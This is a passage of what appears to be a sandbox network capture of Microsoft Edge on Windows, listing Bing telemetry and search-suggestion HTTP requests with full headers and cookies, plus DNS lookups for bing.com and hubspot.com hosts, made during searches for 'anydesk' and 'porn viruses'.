Set-Cookie: _C_Auth=
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144462.1852670c
GET

https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}]

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}] HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHS=PC=U531; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144461&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=1890&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; _C_ETH=1

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:42 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144462.18526eb0
GET

https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144461369%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144461369%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHS=PC=U531; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144461&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=1890&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; _C_ETH=1; USRLOC=HS=1&BLOCK=TS=241005160742; _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:07:42.8178002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=9&RB=0&GB=0&RG=200&RP=6

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:43 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144463.18527000
DNS

th.bing.com

msedge.exe

Remote address:

8.8.8.8:53

Request

th.bing.com

IN A

Response

th.bing.com

IN CNAME

p-th.bing.com.trafficmanager.net

p-th.bing.com.trafficmanager.net

IN CNAME

th.bing.com.edgekey.net

th.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net

e86303.dscx.akamaiedge.net

IN A

92.123.128.162

e86303.dscx.akamaiedge.net

IN A

92.123.128.158

e86303.dscx.akamaiedge.net

IN A

92.123.128.167

e86303.dscx.akamaiedge.net

IN A

92.123.128.164

e86303.dscx.akamaiedge.net

IN A

92.123.128.166

e86303.dscx.akamaiedge.net

IN A

92.123.128.165

e86303.dscx.akamaiedge.net

IN A

92.123.128.163

e86303.dscx.akamaiedge.net

IN A

92.123.128.161

e86303.dscx.akamaiedge.net

IN A

92.123.128.168
DNS

th.bing.com

msedge.exe

Remote address:

8.8.8.8:53

Request

th.bing.com

IN A
DNS

r.bing.com

msedge.exe

Remote address:

8.8.8.8:53

Request

r.bing.com

IN A

Response

r.bing.com

IN CNAME

p-static.bing.trafficmanager.net

p-static.bing.trafficmanager.net

IN CNAME

r.bing.com.edgekey.net

r.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net

e86303.dscx.akamaiedge.net

IN A

92.123.128.164

e86303.dscx.akamaiedge.net

IN A

92.123.128.170

e86303.dscx.akamaiedge.net

IN A

92.123.128.169

e86303.dscx.akamaiedge.net

IN A

92.123.128.171

e86303.dscx.akamaiedge.net

IN A

92.123.128.163

e86303.dscx.akamaiedge.net

IN A

92.123.128.167

e86303.dscx.akamaiedge.net

IN A

92.123.128.166

e86303.dscx.akamaiedge.net

IN A

92.123.128.165

e86303.dscx.akamaiedge.net

IN A

92.123.128.168
DNS

r.bing.com

msedge.exe

Remote address:

8.8.8.8:53

Request

r.bing.com

IN A

Response

api.hubspot.com

IN A

104.16.117.116

api.hubspot.com

IN A

104.16.118.116
DNS

api.hubspot.com

msedge.exe

Remote address:

8.8.8.8:53

Request

api.hubspot.com

IN A

Response

api.hubspot.com

IN A

104.16.118.116

api.hubspot.com

IN A

104.16.117.116
DNS

api.hubspot.com

msedge.exe

Remote address:

8.8.8.8:53

Request

api.hubspot.com

IN A
GET

https://www.bing.com/sa/simg/favicon-trans-bg-000-mg.ico

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /sa/simg/favicon-trans-bg-000-mg.ico HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHHPGUSR=SRCHLANG=en&HV=1728144330

Response

HTTP/1.1 200 OK

Content-Length: 4286
Content-Type: image/x-icon
Cache-Control: public, max-age=15552000
Last-Modified: Mon, 01 Jan 1601 00:00:00 GMT
X-EventID: 66d080a82e6a4aba87357996fb91d797
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy-Report-Only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-XgSkZdMqz/12PaqF+pMRAhgeEL+R0WEW1RF0Fwcn8yg='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
Date: Sat, 05 Oct 2024 16:05:30 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.b6777b5c.1728144330.3bfaab5
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144331917%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144331917%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHHPGUSR=SRCHLANG=en&HV=1728144330&DM=0

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.b6777b5c.1728144332.3bfd081
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144332049%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144332049%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144330&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.b6777b5c.1728144333.3bfe756
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1728144332247%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialNotEnoughPoints%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1728144332371%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1728144332247%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialNotEnoughPoints%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1728144332371%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.b6777b5c.1728144333.3bfe979
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=po&cp=2&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=po&cp=2&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
X-Autosuggest-ContentWidth: 650
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
